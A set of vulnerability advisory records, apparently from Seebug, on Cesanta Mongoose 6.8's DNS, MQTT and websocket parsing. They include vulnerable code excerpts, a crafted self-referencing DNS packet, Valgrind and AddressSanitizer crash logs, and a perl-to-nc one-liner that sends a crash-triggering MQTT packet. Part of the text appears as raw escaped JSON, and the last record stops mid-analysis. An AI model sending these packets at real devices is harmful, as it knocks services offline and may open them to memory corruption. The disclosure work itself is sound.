A name chunk pointer is signalled by a byte with its 2 most significant bits set (0xc0); the remaining bits form an offset to the actual name. In the above code, at [1], a check is performed to see whether the current chunk is actually a pointer, and if so, the offset is extracted instead. At [2], this offset is used to advance the parser by adding it to the start of the packet. The loop then continues at [3].

In the above code, no check is performed to see whether the calculated offset refers to the same position, or whether the pointer points to another pointer. No valid DNS query should have a pointer pointing to another pointer, and precisely that kind of packet will cause an infinite loop in the above code. An example packet:
```
00000000: 0020 a577 0120 0001 0000 0000 0001 c00c  . .w. ..........
00000010: 0000 0000 0100 0100 0029 1000 0000 0000  .........)......
00000020: 0000 0a                                  …
```

At offset 14 above, we have the start of a name chunk which specifies a pointer (0xc0), followed by 0x0c, which represents its offset from the start of the packet, past the 2 ID bytes. When parsing this packet, the function `mg_dns_uncompress_name` will enter an infinite loop, because the first chunk points to itself.

This causes 100% CPU usage and denial of service.

### Timeline
* 2017-08-30 - Vendor Disclosure
* 2017-10-31 - Public Release

Record metadata:
* Type: seebug (bulletin family: exploit)
* Title: Cesanta Mongoose DNS Query Compressed Name Pointer Denial Of Service (CVE-2017-2909)
* CVE: CVE-2017-2909
* Published: 2017-11-09; modified: 2017-11-09
* CVSSv3 / CVSSv2: not given in the record
* Reference: https://www.seebug.org/vuldb/ssvid-96831
* ID: SSV:96831
* Source data: none; source reference: none
* CVSS (record): score 0.0, vector NONE

Seebug record (last seen 2017-11-19T12:04:38):

### Summary
An exploitable arbitrary memory read vulnerability exists in the MQTT packet parsing functionality of Cesanta Mongoose 6.8. 
A specially crafted MQTT packet can cause an arbitrary out-of-bounds memory read and write, potentially resulting in information disclosure, denial of service and remote code execution. An attacker needs to send a specially crafted MQTT packet over the network to trigger this vulnerability.

### Tested Versions
Cesanta Mongoose 6.8

### Product URLs
https://cesanta.com/

### CVSSv3 Score
9.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

### CWE
CWE-190: Integer Overflow or Wraparound

### Details
Mongoose is a monolithic library implementing a number of networking protocols, including HTTP, MQTT, MDNS and others. It is designed with embedded devices in mind and as such is used in many IoT devices and runs on virtually all platforms.

While parsing an MQTT packet with a variable-length header, no check is performed to ensure that the calculated payload length corresponds to the actual received packet. The arbitrary length is used in pointer arithmetic, leading to arbitrary memory access. The variable payload length in an MQTT packet is encoded as 7-bit fields, with the 8th bit of each byte used as a continuation bit. The following code from the `parse_mqtt` function decodes this:
```c
  /* decode mqtt variable length */
  do {
    len += (*p & 127) << 7 * (p - &io->buf[1]);
  } while ((*p++ & 128) != 0 && ((size_t)(p - io->buf) <= io->len));
```

In the above code, no check is performed on the calculated `len` value, which can be arbitrarily large. By the MQTT standard, the largest MQTT packet can be at most 256 megabytes. Further, the following check is performed:
```c
end = p + len;
if (end > io->buf + io->len + 1) {
  return -1;
}
```

In the above code, `end` should point to the end of the message, and the `if` tries to check that it lies within the bounds of the buffer. But since the check compares pointers, an integer overflow can cause `end` to wrap around and point before the start of the message buffer, while `len` still holds the huge value calculated before.

This can cause further memory corruption down the line when the commands sent in the packet are actually handled. For example, this can be exploited by sending a "PUBLISH" command, which ends up notifying all the clients subscribed to a certain topic. Still in the `parse_mqtt` function we see:
```c
    case MG_MQTT_CMD_PUBLISH: {
      if (MG_MQTT_GET_QOS(header) > 0) {
        mm->message_id = getu16(p);
        p += 2;
      }
      p = scanto(p, &mm->topic);
      mm->payload.p = p;
      mm->payload.len = end - p;
      break;
    }
```

The above code handles the "PUBLISH" command and uses the `end` pointer and `p` to calculate the payload length. Due to the previous integer overflow, `end` can point before `p`, leading to a large `payload.len` value which is later used when sending the notification to subscribed clients.

With precise memory layout control, this can be abused to cause an arbitrary write, which could lead to remote code execution. On the other hand, there is a potential to abuse this vulnerability to leak a large amount of data from the process, as the overflowed value is used when sending data to clients. The vulnerability can be triggered by sending the supplied proof-of-concept packet to the sample `mqtt_broker` application supplied with the library. 
It should be noted that, depending on the memory layout, the proof-of-concept packet might not crash the application, but it does trigger the bug.

### Crash Information
```
Valgrind output:
==118470== Memcheck, a memory error detector
==118470== Copyright (C) 2002-2015, and GNU GPL'd, by Julian Seward et al.
==118470== Using Valgrind-3.11.0 and LibVEX; rerun with -h for copyright info
==118470== Command: ../../../vanilla/mongoose/examples/mqtt_broker/mqtt_broker
==118470== 
MQTT broker started on 0.0.0.0:8113
ffff==118470== Invalid read of size 1
==118470==    at 0x4C3236C: memcpy@GLIBC_2.2.5 (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)
==118470==    by 0x403E95: mbuf_insert (mongoose.c:1073)
==118470==    by 0x40EB8D: mg_mqtt_prepend_header (mongoose.c:9824)
==118470==    by 0x40ECCA: mg_mqtt_publish (mongoose.c:9843)
==118470==    by 0x40F9A2: mg_mqtt_broker_handle_publish (mongoose.c:10104)
==118470==    by 0x40FAF4: mg_mqtt_broker (mongoose.c:10136)
==118470==    by 0x40E648: mqtt_handler (mongoose.c:9712)
==118470==    by 0x4071B6: mg_call (mongoose.c:2051)
==118470==    by 0x408362: mg_recv_common (mongoose.c:2505)
==118470==    by 0x408393: mg_if_recv_tcp_cb (mongoose.c:2509)
==118470==    by 0x40A712: mg_handle_tcp_read (mongoose.c:3376)
==118470==    by 0x40AC8A: mg_mgr_handle_conn (mongoose.c:3501)
==118470==  Address 0x5ce0796 is 6 bytes inside a block of size 10 free'd
==118470==    at 0x4C2EDEB: free (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)
==118470==    by 0x4C2FDB7: realloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)
==118470==    by 0x403F74: mbuf_insert (mongoose.c:1080)
==118470==    by 0x404055: mbuf_append (mongoose.c:1096)
==118470==    by 0x409E83: mg_socket_if_tcp_send (mongoose.c:3167)
==118470==    by 0x408158: mg_send (mongoose.c:2463)
==118470==    by 0x40ECA4: mg_mqtt_publish (mongoose.c:9841)
==118470==    by 0x40F9A2: mg_mqtt_broker_handle_publish (mongoose.c:10104)
==118470==    by 0x40FAF4: mg_mqtt_broker (mongoose.c:10136)
==118470==    by 0x40E648: mqtt_handler (mongoose.c:9712)
==118470==    by 0x4071B6: mg_call (mongoose.c:2051)
==118470==    by 0x408362: mg_recv_common (mongoose.c:2505)
==118470==  Block was alloc'd at
==118470==    at 0x4C2FD5F: realloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)
==118470==    by 0x403F74: mbuf_insert (mongoose.c:1080)
==118470==    by 0x404055: mbuf_append (mongoose.c:1096)
==118470==    by 0x409E83: mg_socket_if_tcp_send (mongoose.c:3167)
==118470==    by 0x408158: mg_send (mongoose.c:2463)
==118470==    by 0x40EC51: mg_mqtt_publish (mongoose.c:9836)
==118470==    by 0x40F9A2: mg_mqtt_broker_handle_publish (mongoose.c:10104)
==118470==    by 0x40FAF4: mg_mqtt_broker (mongoose.c:10136)
==118470==    by 0x40E648: mqtt_handler (mongoose.c:9712)
==118470==    by 0x4071B6: mg_call (mongoose.c:2051)
==118470==    by 0x408362: mg_recv_common (mongoose.c:2505)
==118470==    by 0x408393: mg_if_recv_tcp_cb (mongoose.c:2509)
==118470== 
==118470== Invalid write of size 1
==118470==    at 0x4C32372: memcpy@GLIBC_2.2.5 (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)
==118470==    by 0x403E95: mbuf_insert (mongoose.c:1073)
==118470==    by 0x40EB8D: mg_mqtt_prepend_header (mongoose.c:9824)
==118470==    by 0x40ECCA: mg_mqtt_publish (mongoose.c:9843)
==118470==    by 0x40F9A2: mg_mqtt_broker_handle_publish (mongoose.c:10104)
==118470==    by 0x40FAF4: mg_mqtt_broker (mongoose.c:10136)
==118470==    by 0x40E648: mqtt_handler (mongoose.c:9712)
==118470==    by 0x4071B6: mg_call (mongoose.c:2051)
==118470==    by 0x408362: mg_recv_common (mongoose.c:2505)
==118470==    by 0x408393: mg_if_recv_tcp_cb (mongoose.c:2509)
==118470==    by 0x40A712: mg_handle_tcp_read (mongoose.c:3376)
==118470==    by 0x40AC8A: mg_mgr_handle_conn (mongoose.c:3501)
==118470==  Address 0x5ce0798 is 8 bytes inside a block of size 10 free'd
==118470==    at 0x4C2EDEB: free (in 
```
/usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)\r\n==118470== by 0x4C2FDB7: realloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)\r\n==118470== by 0x403F74: mbuf_insert (mongoose.c:1080)\r\n==118470== by 0x404055: mbuf_append (mongoose.c:1096)\r\n==118470== by 0x409E83: mg_socket_if_tcp_send (mongoose.c:3167)\r\n==118470== by 0x408158: mg_send (mongoose.c:2463)\r\n==118470== by 0x40ECA4: mg_mqtt_publish (mongoose.c:9841)\r\n==118470== by 0x40F9A2: mg_mqtt_broker_handle_publish (mongoose.c:10104)\r\n==118470== by 0x40FAF4: mg_mqtt_broker (mongoose.c:10136)\r\n==118470== by 0x40E648: mqtt_handler (mongoose.c:9712)\r\n==118470== by 0x4071B6: mg_call (mongoose.c:2051)\r\n==118470== by 0x408362: mg_recv_common (mongoose.c:2505)\r\n==118470== Block was alloc'd at\r\n==118470== at 0x4C2FD5F: realloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)\r\n==118470== by 0x403F74: mbuf_insert (mongoose.c:1080)\r\n==118470== by 0x404055: mbuf_append (mongoose.c:1096)\r\n==118470== by 0x409E83: mg_socket_if_tcp_send (mongoose.c:3167)\r\n==118470== by 0x408158: mg_send (mongoose.c:2463)\r\n==118470== by 0x40EC51: mg_mqtt_publish (mongoose.c:9836)\r\n==118470== by 0x40F9A2: mg_mqtt_broker_handle_publish (mongoose.c:10104)\r\n==118470== by 0x40FAF4: mg_mqtt_broker (mongoose.c:10136)\r\n==118470== by 0x40E648: mqtt_handler (mongoose.c:9712)\r\n==118470== by 0x4071B6: mg_call (mongoose.c:2051)\r\n==118470== by 0x408362: mg_recv_common (mongoose.c:2505)\r\n==118470== by 0x408393: mg_if_recv_tcp_cb (mongoose.c:2509)\r\n==118470== \r\n==118470== Invalid write of size 2\r\n==118470== at 0x4C32723: memcpy@@GLIBC_2.14 (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)\r\n==118470== by 0x403EBE: mbuf_insert (mongoose.c:1075)\r\n==118470== by 0x40EB8D: mg_mqtt_prepend_header (mongoose.c:9824)\r\n==118470== by 0x40ECCA: mg_mqtt_publish (mongoose.c:9843)\r\n==118470== by 0x40F9A2: mg_mqtt_broker_handle_publish (mongoose.c:10104)\r\n==118470== by 0x40FAF4: 
mg_mqtt_broker (mongoose.c:10136)\r\n==118470== by 0x40E648: mqtt_handler (mongoose.c:9712)\r\n==118470== by 0x4071B6: mg_call (mongoose.c:2051)\r\n==118470== by 0x408362: mg_recv_common (mongoose.c:2505)\r\n==118470== by 0x408393: mg_if_recv_tcp_cb (mongoose.c:2509)\r\n==118470== by 0x40A712: mg_handle_tcp_read (mongoose.c:3376)\r\n==118470== by 0x40AC8A: mg_mgr_handle_conn (mongoose.c:3501)\r\n==118470== Address 0x5ce0790 is 0 bytes inside a block of size 10 free'd\r\n==118470== at 0x4C2EDEB: free (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)\r\n==118470== by 0x4C2FDB7: realloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)\r\n==118470== by 0x403F74: mbuf_insert (mongoose.c:1080)\r\n==118470== by 0x404055: mbuf_append (mongoose.c:1096)\r\n==118470== by 0x409E83: mg_socket_if_tcp_send (mongoose.c:3167)\r\n==118470== by 0x408158: mg_send (mongoose.c:2463)\r\n==118470== by 0x40ECA4: mg_mqtt_publish (mongoose.c:9841)\r\n==118470== by 0x40F9A2: mg_mqtt_broker_handle_publish (mongoose.c:10104)\r\n==118470== by 0x40FAF4: mg_mqtt_broker (mongoose.c:10136)\r\n==118470== by 0x40E648: mqtt_handler (mongoose.c:9712)\r\n==118470== by 0x4071B6: mg_call (mongoose.c:2051)\r\n==118470== by 0x408362: mg_recv_common (mongoose.c:2505)\r\n==118470== Block was alloc'd at\r\n==118470== at 0x4C2FD5F: realloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)\r\n==118470== by 0x403F74: mbuf_insert (mongoose.c:1080)\r\n==118470== by 0x404055: mbuf_append (mongoose.c:1096)\r\n==118470== by 0x409E83: mg_socket_if_tcp_send (mongoose.c:3167)\r\n==118470== by 0x408158: mg_send (mongoose.c:2463)\r\n==118470== by 0x40EC51: mg_mqtt_publish (mongoose.c:9836)\r\n==118470== by 0x40F9A2: mg_mqtt_broker_handle_publish (mongoose.c:10104)\r\n==118470== by 0x40FAF4: mg_mqtt_broker (mongoose.c:10136)\r\n==118470== by 0x40E648: mqtt_handler (mongoose.c:9712)\r\n==118470== by 0x4071B6: mg_call (mongoose.c:2051)\r\n==118470== by 0x408362: mg_recv_common 
(mongoose.c:2505)\r\n==118470== by 0x408393: mg_if_recv_tcp_cb (mongoose.c:2509)\r\n==118470== \r\n==118470== Syscall param socketcall.sendto(msg) points to unaddressable byte(s)\r\n==118470== at 0x54F799D: send (send.c:26)\r\n==118470== by 0x40A40E: mg_write_to_socket (mongoose.c:3316)\r\n==118470== by 0x40ACC2: mg_mgr_handle_conn (mongoose.c:3508)\r\n==118470== by 0x40B6C9: mg_socket_if_poll (mongoose.c:3694)\r\n==118470== by 0x407935: mg_mgr_poll (mongoose.c:2232)\r\n==118470== by 0x4022A6: main (mqtt_broker.c:43)\r\n==118470== Address 0x5ce0790 is 0 bytes inside a block of size 10 free'd\r\n==118470== at 0x4C2EDEB: free (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)\r\n==118470== by 0x4C2FDB7: realloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)\r\n==118470== by 0x403F74: mbuf_insert (mongoose.c:1080)\r\n==118470== by 0x404055: mbuf_append (mongoose.c:1096)\r\n==118470== by 0x409E83: mg_socket_if_tcp_send (mongoose.c:3167)\r\n==118470== by 0x408158: mg_send (mongoose.c:2463)\r\n==118470== by 0x40ECA4: mg_mqtt_publish (mongoose.c:9841)\r\n==118470== by 0x40F9A2: mg_mqtt_broker_handle_publish (mongoose.c:10104)\r\n==118470== by 0x40FAF4: mg_mqtt_broker (mongoose.c:10136)\r\n==118470== by 0x40E648: mqtt_handler (mongoose.c:9712)\r\n==118470== by 0x4071B6: mg_call (mongoose.c:2051)\r\n==118470== by 0x408362: mg_recv_common (mongoose.c:2505)\r\n==118470== Block was alloc'd at\r\n==118470== at 0x4C2FD5F: realloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)\r\n==118470== by 0x403F74: mbuf_insert (mongoose.c:1080)\r\n==118470== by 0x404055: mbuf_append (mongoose.c:1096)\r\n==118470== by 0x409E83: mg_socket_if_tcp_send (mongoose.c:3167)\r\n==118470== by 0x408158: mg_send (mongoose.c:2463)\r\n==118470== by 0x40EC51: mg_mqtt_publish (mongoose.c:9836)\r\n==118470== by 0x40F9A2: mg_mqtt_broker_handle_publish (mongoose.c:10104)\r\n==118470== by 0x40FAF4: mg_mqtt_broker (mongoose.c:10136)\r\n==118470== by 0x40E648: mqtt_handler 
(mongoose.c:9712)\r\n==118470== by 0x4071B6: mg_call (mongoose.c:2051)\r\n==118470== by 0x408362: mg_recv_common (mongoose.c:2505)\r\n==118470== by 0x408393: mg_if_recv_tcp_cb (mongoose.c:2509)\r\n```\r\n\r\n### Timeline\r\n* 2017-08-30 - Vendor Disclosure\r\n* 2017-10-31 - Public Release", "cvss3": {}, "published": "2017-11-09T00:00:00", "type": "seebug", "title": "Cesanta Mongoose MQTT Payload Length Remote Code Execution(CVE-2017-2892)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-2892"], "modified": "2017-11-09T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96835", "id": "SSV:96835", "sourceData": "", "sourceHref": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-11-19T11:55:38", "description": "### Summary\r\nAn exploitable NULL pointer dereference vulnerability exists in the MQTT packet parsing functionality of Cesanta Mongoose 6.8. An MQTT SUBSCRIBE packet can cause a NULL pointer dereference leading to server crash and denial of service. An attacker needs to send a specially crafted MQTT packet over the network to trigger this vulnerability.\r\n\r\n### Tested Versions\r\nCesanta Mongoose 6.8\r\n\r\n### Product URLs\r\nhttps://cesanta.com/\r\n\r\n### CVSSv3 Score\r\n7.5 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\r\n\r\n### CWE\r\nCWE-476: NULL Pointer Dereference\r\n\r\n### Details\r\nMongoose is a monolithic library implementing a number of networking protocols, including HTTP, MQTT, MDNS and others. It is designed with embedded devices in mind and as such is used in many IoT devices and runs on virtually all platforms.\r\n\r\nIn the MQTT protocol, a client initiates the connection by sending a CONNECT command, to which a server replies with CONNACK and then client proceeds with other commands. In the case of the mongoose MQTT server, if an out of order SUBSCRIBE packet is received by the server certain uninitialized structures are accessed which can lead to NULL pointer dereference and server crash. 
Specifically, in the function `mg_mqtt_broker_handle_subscribe`:\r\n```\r\nstruct mg_mqtt_session *ss = (struct mg_mqtt_session *) nc->user_data; [1]\r\nuint8_t qoss[512];\r\nsize_t qoss_len = 0;\r\n struct mg_str topic;\r\n uint8_t qos;\r\n int pos;\r\n struct mg_mqtt_topic_expression *te;\r\n\r\n for (pos = 0;\r\n (pos = mg_mqtt_next_subscribe_topic(msg, &topic, &qos, pos)) != -1;) {\r\n qoss[qoss_len++] = qos;\r\n\r\n\r\n ss->subscriptions = (struct mg_mqtt_topic_expression *) realloc(\r\n ss->subscriptions, sizeof(*ss->subscriptions) * qoss_len); [2]\r\n```\r\n\r\nIn the above code, at [1] we see `ss` being initialized to point to `nc->user_data`, which can be NULL. At [2] the `ss` pointer is dereferenced to access the `subscriptions` field, which causes a NULL pointer dereference and leads to a server crash. This vulnerability can be triggered by sending the bytes from the proof of concept to the sample `mqtt_broker` application supplied with the library.\r\n\r\n### Crash Information\r\n```\r\nValgrind output:\r\n\r\n\r\n==119048== Invalid read of size 8\r\n==119048== at 0x40F696: mg_mqtt_broker_handle_subscribe (mongoose.c:10050)\r\n==119048== by 0x40FADF: mg_mqtt_broker (mongoose.c:10133)\r\n==119048== by 0x40E648: mqtt_handler (mongoose.c:9712)\r\n==119048== by 0x4071B6: mg_call (mongoose.c:2051)\r\n==119048== by 0x408362: mg_recv_common (mongoose.c:2505)\r\n==119048== by 0x408393: mg_if_recv_tcp_cb (mongoose.c:2509)\r\n==119048== by 0x40A712: mg_handle_tcp_read (mongoose.c:3376)\r\n==119048== by 0x40AC8A: mg_mgr_handle_conn (mongoose.c:3501)\r\n==119048== by 0x40B6C9: mg_socket_if_poll (mongoose.c:3694)\r\n==119048== by 0x407935: mg_mgr_poll (mongoose.c:2232)\r\n==119048== by 0x4022A6: main (mqtt_broker.c:43)\r\n==119048== Address 0x30 is not stack'd, malloc'd or (recently) free'd\r\n==119048==\r\n==119048==\r\n==119048== Process terminating with default action of signal 11 (SIGSEGV): dumping core\r\n==119048== Access not within mapped region at address 
0x30\r\n==119048== at 0x40F696: mg_mqtt_broker_handle_subscribe (mongoose.c:10050)\r\n==119048== by 0x40FADF: mg_mqtt_broker (mongoose.c:10133)\r\n==119048== by 0x40E648: mqtt_handler (mongoose.c:9712)\r\n==119048== by 0x4071B6: mg_call (mongoose.c:2051)\r\n==119048== by 0x408362: mg_recv_common (mongoose.c:2505)\r\n==119048== by 0x408393: mg_if_recv_tcp_cb (mongoose.c:2509)\r\n==119048== by 0x40A712: mg_handle_tcp_read (mongoose.c:3376)\r\n==119048== by 0x40AC8A: mg_mgr_handle_conn (mongoose.c:3501)\r\n==119048== by 0x40B6C9: mg_socket_if_poll (mongoose.c:3694)\r\n==119048== by 0x407935: mg_mgr_poll (mongoose.c:2232)\r\n==119048== by 0x4022A6: main (mqtt_broker.c:43)\r\n==119048== If you believe this happened as a result of a stack\r\n==119048== overflow in your program's main thread (unlikely but\r\n==119048== possible), you can try to increase the size of the\r\n==119048== main thread stack using the --main-stacksize= flag.\r\n==119048== The main thread stack size used in this run was 8388608.\r\n==119048==\r\n==119048== HEAP SUMMARY:\r\n==119048== in use at exit: 5,698 bytes in 154 blocks\r\n==119048== total heap usage: 159 allocs, 5 frees, 7,154 bytes allocated\r\n==119048==\r\n==119048== LEAK SUMMARY:\r\n==119048== definitely lost: 0 bytes in 0 blocks\r\n==119048== indirectly lost: 0 bytes in 0 blocks\r\n==119048== possibly lost: 0 bytes in 0 blocks\r\n==119048== still reachable: 5,698 bytes in 154 blocks\r\n==119048== suppressed: 0 bytes in 0 blocks\r\n==119048== Rerun with --leak-check=full to see details of leaked memory\r\n==119048==\r\n==119048== For counts of detected and suppressed errors, rerun with: -v\r\n==119048== ERROR SUMMARY: 1 errors from 1 contexts (suppressed: 0 from 0)\r\nSegmentation fault\r\n```\r\n\r\n### Timeline\r\n* 2017-08-30 - Vendor Disclosure\r\n* 2017-10-31 - Public Release", "cvss3": {}, "published": "2017-11-08T00:00:00", "type": "seebug", "title": "Cesanta Mongoose MQTT SUBSCRIBE Command Denial Of Service(CVE-2017-2893)", 
"bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-2893"], "modified": "2017-11-08T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96809", "id": "SSV:96809", "sourceData": "\n perl -e 'print \"\\x80\\x86\\x00\\x00AAAA\"' | nc\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-96809", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-11-19T11:55:48", "description": "### Summary\r\nAn exploitable arbitrary memory read vulnerability exists in the MQTT packet parsing functionality of Cesanta Mongoose 6.8. A specially crafted MQTT SUBSCRIBE packet can cause an arbitrary out-of-bounds memory read potentially resulting in information disclosure and denial of service. An attacker needs to send a specially crafted MQTT packet over the network to trigger this vulnerability.\r\n\r\n### Tested Versions\r\nCesanta Mongoose 6.8\r\n\r\n### Product URLs\r\nhttps://cesanta.com/\r\n\r\n### CVSSv3 Score\r\n8.2 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H\r\n\r\n### CWE\r\nCWE-190: Integer Overflow or Wraparound\r\n\r\n### Details\r\nMongoose is a monolithic library implementing a number of networking protocols, including HTTP, MQTT, MDNS and others. It is designed with embedded devices in mind and as such is used in many IoT devices and runs on virtually all platforms.\r\n\r\nWhile parsing the SUBSCRIBE command of an MQTT packet, the topic string size as encoded in the packet is trusted without any additional validation. This arbitrary length value is used in pointer arithmetic and can cause out-of-bounds memory access. 
The vulnerability occurs in the function `mg_mqtt_next_subscribe_topic`:\r\n```\r\nint mg_mqtt_next_subscribe_topic(struct mg_mqtt_message *msg,\r\n struct mg_str *topic, uint8_t *qos, int pos) {\r\n unsigned char *buf = (unsigned char *) msg->payload.p + pos;\r\n\r\n if ((size_t) pos >= msg->payload.len) {\r\n return -1;\r\n }\r\n\r\n topic->len = buf[0] << 8 | buf[1]; [1]\r\n topic->p = (char *) buf + 2;\r\n *qos = buf[2 + topic->len]; [2]\r\n return pos + 2 + topic->len + 1;\r\n}\r\n```\r\n\r\nIn the above code, at [1] two bytes from the message buffer are read as `topic->len` and then immediately used at [2] to calculate the offset to `qos`. No check is performed to ensure that the offset lies inside the bounds of the buffer, which is limited in size. This issue can be triggered multiple times and, with careful control of the memory layout, could be abused to leak memory and cause denial of service.\r\n\r\nThe vulnerability can be triggered by sending the supplied proof of concept packet to the sample `mqtt_broker` application supplied with the library.\r\n\r\n### Crash Information\r\n```\r\nAddress Sanitizer output:\r\n==118728==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x619000014986 at pc 0x00000051e4c5 bp 0x7fffffffaf50 sp \r\n0x7fffffffaf48\r\nREAD of size 1 at 0x619000014986 thread T0\r\n #0 0x51e4c4 (/home/user/mongoose/examples/mqtt_broker/mqtt_broker+0x51e4c4)\r\n #1 0x515174 (/home/user/mongoose/examples/mqtt_broker/mqtt_broker+0x515174)\r\n #2 0x4fa825 (/home/user/mongoose/examples/mqtt_broker/mqtt_broker+0x4fa825)\r\n #3 0x4fea17 (/home/user/mongoose/examples/mqtt_broker/mqtt_broker+0x4fea17)\r\n #4 0x50a8e7 (/home/user/mongoose/examples/mqtt_broker/mqtt_broker+0x50a8e7)\r\n #5 0x50efa8 (/home/user/mongoose/examples/mqtt_broker/mqtt_broker+0x50efa8)\r\n #6 0x4fc145 (/home/user/mongoose/examples/mqtt_broker/mqtt_broker+0x4fc145)\r\n #7 0x4eb5ea (/home/user/mongoose/examples/mqtt_broker/mqtt_broker+0x4eb5ea)\r\n #8 0x7ffff683882f 
(/lib/x86_64-linux-gnu/libc.so.6+0x2082f)\r\n #9 0x419978 (/home/user/mongoose/examples/mqtt_broker/mqtt_broker+0x419978)\r\n\r\n\r\nAddressSanitizer can not describe address in more detail (wild memory access suspected).\r\nSUMMARY: AddressSanitizer: heap-buffer-overflow (/home/user/mongoose/examples/mqtt_broker/mqtt_broker+0x51e4c4)\r\nShadow bytes around the buggy address:\r\n 0x0c327fffa8e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c327fffa8f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c327fffa900: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c327fffa910: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c327fffa920: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n=>0x0c327fffa930:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c327fffa940: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c327fffa950: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c327fffa960: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c327fffa970: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c327fffa980: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\n ddressable: 00\r\n Partially addressable: 01 02 03 04 05 06 07\r\n Heap left redzone: fa\r\n Heap right redzone: fb\r\n Freed heap region: fd\r\n Stack left redzone: f1\r\n Stack mid redzone: f2\r\n Stack right redzone: f3\r\n Stack partial redzone: f4\r\n Stack after return: f5\r\n Stack use after scope: f8\r\n Global redzone: f9\r\n Global init order: f6\r\n Poisoned by user: f7\r\n Container overflow: fc\r\n Array cookie: ac\r\n Intra object redzone: bb\r\n ASan internal: fe\r\n Left alloca redzone: ca\r\n Right alloca redzone: cb\r\n ==118728==ABORTING\r\n```\r\n\r\n### Timeline\r\n* 2017-08-30 - Vendor Disclosure\r\n* 2017-10-31 - Public Release", "cvss3": {}, "published": "2017-11-08T00:00:00", "type": "seebug", "title": "Cesanta Mongoose MQTT SUBSCRIBE Topic Length Information 
Leak(CVE-2017-2895)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-2895"], "modified": "2017-11-08T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96807", "id": "SSV:96807", "sourceData": "\n", "sourceHref": "https://www.seebug.org/vuldb/ssvid-96807", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-11-19T11:55:39", "description": "### Summary\r\nAn exploitable memory corruption vulnerability exists in the Websocket protocol implementation of Cesanta Mongoose 6.8. A specially crafted websocket packet can cause a buffer to be allocated while leaving stale pointers, which leads to a use-after-free vulnerability that can be exploited to achieve remote code execution. An attacker needs to send a specially crafted websocket packet over the network to trigger this vulnerability.\r\n\r\n### Tested Versions\r\nCesanta Mongoose 6.8\r\n\r\n### Product URLs\r\nhttps://cesanta.com/\r\n\r\n### CVSSv3 Score\r\n9.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\r\n\r\n### CWE\r\nCWE-416: Use After Free\r\n\r\n### Details\r\nMongoose is a monolithic library implementing a number of networking protocols, including HTTP, MQTT, MDNS and others. Its HTTP implementation includes the upgrade support required for websocket applications. It is designed with embedded devices in mind and as such is used in many IoT devices and runs on virtually all platforms.\r\n\r\nA websocket frame can be fragmented over multiple packets. Flags in the websocket header specify whether the packet is fragmented and its order. 
When encountering a first frame fragment, a buffer reallocation causes several pointers to become invalid, but the code doesn\u2019t invalidate or update them, leading to a potential use-after-free condition which can lead to further memory corruption.\r\n\r\nIn the function `mg_deliver_websocket_data`, responsible for parsing the websocket packet, we observe the following code:\r\n```\r\n if (reass) { [1]\r\n /* On first fragmented frame, nullify size */\r\n if (mg_is_ws_first_fragment(wsm.flags)) { [2]\r\n mbuf_resize(&nc->recv_mbuf, nc->recv_mbuf.size + sizeof(*sizep)); [3]\r\n p[0] &= ~0x0f; /* Next frames will be treated as continuation */ [4]\r\n buf = p + 1 + sizeof(*sizep); [5]\r\n *sizep = 0; /* TODO(lsm): fix. this can stomp over frame data */ [6]\r\n }\r\n\r\n /* Append this frame to the reassembled buffer */ \r\n memmove(buf, wsm.data, e - wsm.data); [7]\r\n```\r\n\r\nIn the above code, if the packet is marked for reassembly (checked at [1]) and is the first fragment (checked at [2]), the receive buffer is resized at [3]. The function `mbuf_resize` actually calls `realloc` to resize the buffer. Calling `realloc` on a buffer doesn\u2019t guarantee that the same memory will be used: a different heap chunk can be chosen and the original data copied there. This effectively makes the old pointers, which point into the original buffer, invalid. In the above code, stale pointers are reused at [4], [5], [6] and [7] to do memory reads, writes and a memory copy. 
